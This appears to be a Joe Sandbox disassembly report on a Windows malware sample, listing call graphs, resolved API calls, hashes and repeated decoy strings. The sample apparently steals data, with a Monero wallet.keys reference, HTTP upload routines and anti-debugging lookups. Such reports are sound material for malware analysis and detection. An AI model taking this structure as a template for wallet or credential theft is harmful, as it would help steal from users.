15452 397780 RegCloseKey 15451->15452 15453 397765 RegQueryValueExA 15451->15453 15454 397793 15452->15454 15453->15452 15454->15450 15455->15337 15457 3989f9 GetProcessHeap HeapFree 15456->15457 15458 398a0c 15456->15458 15457->15458 15458->15373 15459->15373 15461 39a7a0 lstrcpy 15460->15461 15462 385119 15461->15462 15463 3847b0 2 API calls 15462->15463 15464 385125 15463->15464 15620 398ea0 15464->15620 15466 385184 15467 385192 lstrlen 15466->15467 15468 3851a5 15467->15468 15469 398ea0 4 API calls 15468->15469 15470 3851b6 15469->15470 15471 39a740 lstrcpy 15470->15471 15472 3851c9 15471->15472 15473 39a740 lstrcpy 15472->15473 15474 3851d6 15473->15474 15475 39a740 lstrcpy 15474->15475 15476 3851e3 15475->15476 15477 39a740 lstrcpy 15476->15477 15478 3851f0 15477->15478 15479 39a740 lstrcpy 15478->15479 15480 3851fd InternetOpenA StrCmpCA 15479->15480 15481 38522f 15480->15481 15482 3858c4 InternetCloseHandle 15481->15482 15483 398b60 3 API calls 15481->15483 15489 3858d9 ctype 15482->15489 15484 38524e 15483->15484 15485 39a920 3 API calls 15484->15485 15486 385261 15485->15486 15487 39a8a0 lstrcpy 15486->15487 15488 38526a 15487->15488 15490 39a9b0 4 API calls 15488->15490 15493 39a7a0 lstrcpy 15489->15493 15491 3852ab 15490->15491 15492 39a920 3 API calls 15491->15492 15494 3852b2 15492->15494 15501 385913 15493->15501 15495 39a9b0 4 API calls 15494->15495 15496 3852b9 15495->15496 15497 39a8a0 lstrcpy 15496->15497 15498 3852c2 15497->15498 15499 39a9b0 4 API calls 15498->15499 15500 385303 15499->15500 15502 39a920 3 API calls 15500->15502 15501->15447 15503 38530a 15502->15503 15504 39a8a0 lstrcpy 15503->15504 15505 385313 15504->15505 15506 385329 InternetConnectA 15505->15506 15506->15482 15507 385359 HttpOpenRequestA 15506->15507 15509 3858b7 InternetCloseHandle 15507->15509 15510 3853b7 15507->15510 15509->15482 15511 39a9b0 4 API calls 15510->15511 15512 3853cb 15511->15512 15513 39a8a0 lstrcpy 15512->15513 15514 3853d4 15513->15514 15515 39a920 3 
API calls 15514->15515 15516 3853f2 15515->15516 15517 39a8a0 lstrcpy 15516->15517 15518 3853fb 15517->15518 15519 39a9b0 4 API calls 15518->15519 15520 38541a 15519->15520 15521 39a8a0 lstrcpy 15520->15521 15522 385423 15521->15522 15523 39a9b0 4 API calls 15522->15523 15524 385444 15523->15524 15525 39a8a0 lstrcpy 15524->15525 15526 38544d 15525->15526 15527 39a9b0 4 API calls 15526->15527 15528 38546e 15527->15528 15529 39a8a0 lstrcpy 15528->15529 15621 398ead CryptBinaryToStringA 15620->15621 15625 398ea9 15620->15625 15622 398ece GetProcessHeap RtlAllocateHeap 15621->15622 15621->15625 15623 398ef4 ctype 15622->15623 15622->15625 15624 398f05 CryptBinaryToStringA 15623->15624 15624->15625 15625->15466 15629->14902 15872 389880 15630->15872 15632 3898e1 15632->14909 15634 39a740 lstrcpy 15633->15634 15635 38fb16 15634->15635 15807 39a740 lstrcpy 15806->15807 15808 390266 15807->15808 15809 398de0 2 API calls 15808->15809 15810 39027b 15809->15810 15811 39a920 3 API calls 15810->15811 15812 39028b 15811->15812 15813 39a8a0 lstrcpy 15812->15813 15814 390294 15813->15814 15815 39a9b0 4 API calls 15814->15815 15816 3902b8 15815->15816 15873 38988e 15872->15873 15876 386fb0 15873->15876 15875 3898ad ctype 15875->15632 15879 386d40 15876->15879 15880 386d63 15879->15880 15887 386d59 15879->15887 15880->15887 15893 386660 15880->15893 15882 386dbe 15882->15887 15899 3869b0 15882->15899 15884 386e2a 15885 386ee6 VirtualFree 15884->15885 15884->15887 15888 386ef7 15884->15888 15885->15888 15886 386f41 15886->15887 15889 3989f0 2 API calls 15886->15889 15887->15875 15888->15886 15890 386f38 15888->15890 15891 386f26 FreeLibrary 15888->15891 15889->15887 15892 3989f0 2 API calls 15890->15892 15891->15888 15892->15886 15898 38668f VirtualAlloc 15893->15898 15895 386730 15896 38673c 15895->15896 15897 386743 VirtualAlloc 15895->15897 15896->15882 15897->15896 15898->15895 15898->15896 15900 3869c9 15899->15900 15904 3869d5 15899->15904 15901 386a09 LoadLibraryA 15900->15901 
15900->15904 15902 386a32 15901->15902 15901->15904 15906 386ae0 15902->15906 15909 398a10 GetProcessHeap RtlAllocateHeap 15902->15909 15904->15884 15905 386ba8 GetProcAddress 15905->15904 15905->15906 15906->15904 15906->15905 15907 3989f0 2 API calls 15907->15906 15908 386a8b 15908->15904 15908->15907 15909->15908

                          Control-flow Graph
                          control_flow_graph 660 399860-399874 call 399750 663 39987a-399a8e call 399780 GetProcAddress * 21 660->663 664 399a93-399af2 LoadLibraryA * 5 660->664 663->664 666 399b0d-399b14 664->666 667 399af4-399b08 GetProcAddress 664->667 669 399b46-399b4d 666->669 670 399b16-399b41 GetProcAddress * 2 666->670 667->666 671 399b68-399b6f 669->671 672 399b4f-399b63 GetProcAddress 669->672 670->669 673 399b89-399b90 671->673 674 399b71-399b84 GetProcAddress 671->674 672->671 675 399bc1-399bc2 673->675 676 399b92-399bbc GetProcAddress * 2 673->676 674->673 676->675
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00E324E8), ref: 003998A1
                          • GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 003998BA
                          • GetProcAddress.KERNEL32(74DD0000,00E32248), ref: 003998D2
                          • GetProcAddress.KERNEL32(74DD0000,00E324A0), ref: 003998EA
                          • GetProcAddress.KERNEL32(74DD0000,00E322F0), ref: 00399903
                          • GetProcAddress.KERNEL32(74DD0000,00E38F68), ref: 0039991B
                          • GetProcAddress.KERNEL32(74DD0000,00E258D0), ref: 00399933
                          • GetProcAddress.KERNEL32(74DD0000,00E258B0), ref: 0039994C
                          • GetProcAddress.KERNEL32(74DD0000,00E32470), ref: 00399964
                          • GetProcAddress.KERNEL32(74DD0000,00E32260), ref: 0039997C
                          • GetProcAddress.KERNEL32(74DD0000,00E324D0), ref: 00399995
                          • GetProcAddress.KERNEL32(74DD0000,00E32500), ref: 003999AD
                          • GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 003999C5
                          • GetProcAddress.KERNEL32(74DD0000,00E32278), ref: 003999DE
                          • GetProcAddress.KERNEL32(74DD0000,00E322A8), ref: 003999F6
                          • GetProcAddress.KERNEL32(74DD0000,00E25890), ref: 00399A0E
                          • GetProcAddress.KERNEL32(74DD0000,00E32308), ref: 00399A27
                          • GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 00399A3F
                          • GetProcAddress.KERNEL32(74DD0000,00E25810), ref: 00399A57
                          • GetProcAddress.KERNEL32(74DD0000,00E32350), ref: 00399A70
                          • GetProcAddress.KERNEL32(74DD0000,00E25830), ref: 00399A88
                          • LoadLibraryA.KERNEL32(00E325A8,?,00396A00), ref: 00399A9A
                          • LoadLibraryA.KERNEL32(00E325C0,?,00396A00), ref: 00399AAB
                          • LoadLibraryA.KERNEL32(00E32560,?,00396A00), ref: 00399ABD
                          • LoadLibraryA.KERNEL32(00E325D8,?,00396A00), ref: 00399ACF
                          • LoadLibraryA.KERNEL32(00E32518,?,00396A00), ref: 00399AE0
                          • GetProcAddress.KERNEL32(75A70000,00E32548), ref: 00399B02
                          • GetProcAddress.KERNEL32(75290000,00E32530), ref: 00399B23
                          • GetProcAddress.KERNEL32(75290000,00E32578), ref: 00399B3B
                          • GetProcAddress.KERNEL32(75BD0000,00E32590), ref: 00399B5D
                          • GetProcAddress.KERNEL32(75450000,00E256B0), ref: 00399B7E
                          • GetProcAddress.KERNEL32(76E90000,00E390E8), ref: 00399B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00399BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: #$0%$0X$@$$H"$H%$NtQueryInformationProcess$P#$`"$`%$p$$x"$x%$$
                          • API String ID: 2238633743-115596743
                          • Opcode ID: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                          • Instruction ID: 0afa8450dcb3e2371a29d91b22d20635bc77a6efdd8a56d5291d6a3c66bfd0f3
                          • Opcode Fuzzy Hash: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                          • Instruction Fuzzy Hash: 30A1BFB5500A489FD308EFA8FD88E563FF9F76C309704851AE605C3225D779984AFB16

                          Control-flow Graph

                          control_flow_graph 764 3845c0-384695 RtlAllocateHeap 781 3846a0-3846a6 764->781 782 3846ac-38474a 781->782 783 38474f-3847a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0038460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0038479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384729
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: e8297b0fdb1e1be9dbb65f005cee2f66a698275bfe51c859b588e4d9419d9fe1
                          • Instruction ID: 59f271fcaa40b288cfa0509b103bbb4aa15dd14c8d7db079c385bb17736d5413
                          • Opcode Fuzzy Hash: e8297b0fdb1e1be9dbb65f005cee2f66a698275bfe51c859b588e4d9419d9fe1
                          • Instruction Fuzzy Hash: 6641E5607C76047EE627BFAC98EAEDD77D6DF8B748F505046E810962C0CFB065A04636

                          Control-flow Graph

                          control_flow_graph 801 384880-384942 call 39a7a0 call 3847b0 call 39a740 * 5 InternetOpenA StrCmpCA 816 38494b-38494f 801->816 817 384944 801->817 818 384ecb-384ef3 InternetCloseHandle call 39aad0 call 389ac0 816->818 819 384955-384acd call 398b60 call 39a920 call 39a8a0 call 39a800 * 2 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a920 call 39a8a0 call 39a800 * 2 InternetConnectA 816->819 817->816 829 384f32-384fa2 call 398990 * 2 call 39a7a0 call 39a800 * 8 818->829 830 384ef5-384f2d call 39a820 call 39a9b0 call 39a8a0 call 39a800 818->830 819->818 905 384ad3-384ad7 819->905 830->829 906 384ad9-384ae3 905->906 907 384ae5 905->907 908 384aef-384b22 HttpOpenRequestA 906->908 907->908 909 384b28-384e28 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a740 call 39a920 * 2 call 39a8a0 call 39a800 * 2 call 39aad0 lstrlen call 39aad0 * 2 lstrlen call 39aad0 HttpSendRequestA 908->909 910 384ebe-384ec5 InternetCloseHandle 908->910 1021 384e32-384e5c InternetReadFile 909->1021 910->818 1022 384e5e-384e65 1021->1022 1023 384e67-384eb9 InternetCloseHandle call 39a800 1021->1023 1022->1023 1024 384e69-384ea7 call 39a9b0 call 39a8a0 call 39a800 1022->1024 1023->910 1024->1021
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00384915
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 0038493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00384ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003A0DDB,00000000,?,?,00000000,?,",00000000,?,00E3EAA8), ref: 00384DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00384E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00384E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00384E49
                          • InternetCloseHandle.WININET(00000000), ref: 00384EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00384EC5
                          • HttpOpenRequestA.WININET(00000000,00E3EA58,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00384B15
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • InternetCloseHandle.WININET(00000000), ref: 00384ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------$X
                          • API String ID: 460715078-4062443838
                          • Opcode ID: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                          • Instruction ID: eb82dbc147df63bf3853bbf4796108b4aa75eb66df94355a39ca6133160286d9
                          • Opcode Fuzzy Hash: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                          • Instruction Fuzzy Hash: 8712D0729206189ADF16EB90DC92FEEB778BF55300F504299F10666091EF702F49DFA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                          • Instruction ID: 6e16944608dc63ea6d3a9f65c249c60cada6f8bcf7c3beec70a1a06307d3152a
                          • Opcode Fuzzy Hash: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                          • Instruction Fuzzy Hash: 27F04FB1944609AFDB00DF99DD4AFAEBFB8FB04715F10025AFA05A2680C77815048BA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                          • Instruction ID: ddcf895beb346e7908b5dd2dd2d339100d6328637f3f925fcba0c875c603a022
                          • Opcode Fuzzy Hash: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                          • Instruction Fuzzy Hash: B2D05E7490030CDFCB00EFE0DC8DADDBBB8FB08315F000594D90562340EA305486CBA6

                          Control-flow Graph

                          control_flow_graph 633 399c10-399c1a 634 399c20-39a031 GetProcAddress * 43 633->634 635 39a036-39a0ca LoadLibraryA * 8 633->635 634->635 636 39a0cc-39a141 GetProcAddress * 5 635->636 637 39a146-39a14d 635->637 636->637 638 39a153-39a211 GetProcAddress * 8 637->638 639 39a216-39a21d 637->639 638->639 640 39a298-39a29f 639->640 641 39a21f-39a293 GetProcAddress * 5 639->641 642 39a2a5-39a332 GetProcAddress * 6 640->642 643 39a337-39a33e 640->643 641->640 642->643 644 39a41f-39a426 643->644 645 39a344-39a41a GetProcAddress * 9 643->645 646 39a428-39a49d GetProcAddress * 5 644->646 647 39a4a2-39a4a9 644->647 645->644 646->647 648 39a4ab-39a4d7 GetProcAddress * 2 647->648 649 39a4dc-39a4e3 647->649 648->649 650 39a515-39a51c 649->650 651 39a4e5-39a510 GetProcAddress * 2 649->651 652 39a612-39a619 650->652 653 39a522-39a60d GetProcAddress * 10 650->653 651->650 654 39a61b-39a678 GetProcAddress * 4 652->654 655 39a67d-39a684 652->655 653->652 654->655 656 39a69e-39a6a5 655->656 657 39a686-39a699 GetProcAddress 655->657 658 39a708-39a709 656->658 659 39a6a7-39a703 GetProcAddress * 4 656->659 657->656 659->658
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00E25770), ref: 00399C2D
                          • GetProcAddress.KERNEL32(74DD0000,00E25790), ref: 00399C45
                          • GetProcAddress.KERNEL32(74DD0000,00E396A0), ref: 00399C5E
                          • GetProcAddress.KERNEL32(74DD0000,00E396B8), ref: 00399C76
                          • GetProcAddress.KERNEL32(74DD0000,00E39610), ref: 00399C8E
                          • GetProcAddress.KERNEL32(74DD0000,00E39628), ref: 00399CA7
                          • GetProcAddress.KERNEL32(74DD0000,00E2BA68), ref: 00399CBF
                          • GetProcAddress.KERNEL32(74DD0000,00E3D3E0), ref: 00399CD7
                          • GetProcAddress.KERNEL32(74DD0000,00E3D200), ref: 00399CF0
                          • GetProcAddress.KERNEL32(74DD0000,00E3D218), ref: 00399D08
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2D8), ref: 00399D20
                          • GetProcAddress.KERNEL32(74DD0000,00E257D0), ref: 00399D39
                          • GetProcAddress.KERNEL32(74DD0000,00E25970), ref: 00399D51
                          • GetProcAddress.KERNEL32(74DD0000,00E257F0), ref: 00399D69
                          • GetProcAddress.KERNEL32(74DD0000,00E25870), ref: 00399D82
                          • GetProcAddress.KERNEL32(74DD0000,00E3D278), ref: 00399D9A
                          • GetProcAddress.KERNEL32(74DD0000,00E3D248), ref: 00399DB2
                          • GetProcAddress.KERNEL32(74DD0000,00E2B950), ref: 00399DCB
                          • GetProcAddress.KERNEL32(74DD0000,00E25A90), ref: 00399DE3
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2F0), ref: 00399DFB
                          • GetProcAddress.KERNEL32(74DD0000,00E3D260), ref: 00399E14
                          • GetProcAddress.KERNEL32(74DD0000,00E3D110), ref: 00399E2C
                          • GetProcAddress.KERNEL32(74DD0000,00E3D320), ref: 00399E44
                          • GetProcAddress.KERNEL32(74DD0000,00E25930), ref: 00399E5D
                          • GetProcAddress.KERNEL32(74DD0000,00E3D0F8), ref: 00399E75
                          • GetProcAddress.KERNEL32(74DD0000,00E3D3B0), ref: 00399E8D
